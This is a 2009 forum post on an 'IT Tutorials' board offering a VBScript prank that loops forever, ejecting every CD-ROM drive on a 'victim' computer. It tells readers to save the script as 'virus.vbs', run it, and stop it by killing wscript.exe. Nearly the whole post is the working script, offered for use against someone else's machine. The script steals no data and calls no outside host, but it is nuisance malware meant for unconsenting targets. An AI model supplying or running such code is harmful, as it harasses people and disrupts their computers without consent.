Hymoo
# A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Go Back Hymoo > IT Tutorials Forum > This will make victim cd rom open and close works 100 %
 
LinkBack Thread Tools
Old 07-06-2009, 02:07 PM
Darknez's Avatar
Forum Manager
Join Date: Jun 2009
Posts: 12,542
iTrader: 0 / 0%
Hymoo Points: 104.9
Darknez is on a distinguished road
Send a message via Yahoo to Darknez
Smile This will make victim cd rom open and close works 100 %

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If



copy this into notepad and save it as anyname.vbs like virus.vbs
and then double click on it...what u see....bingo

Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process

Download this Tutorial as PDFpdf


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools


Share This Thread
  • Submit Thread to Twitter
  • Submit Thread to StumbleUpon
  • Submit Thread to Digg
  • Submit Thread to Reddit
  • Submit Thread to del.icio.us

Darknez's Threads
Similar Threads
Newest Threads
Latest Posts
©2010 Hymoo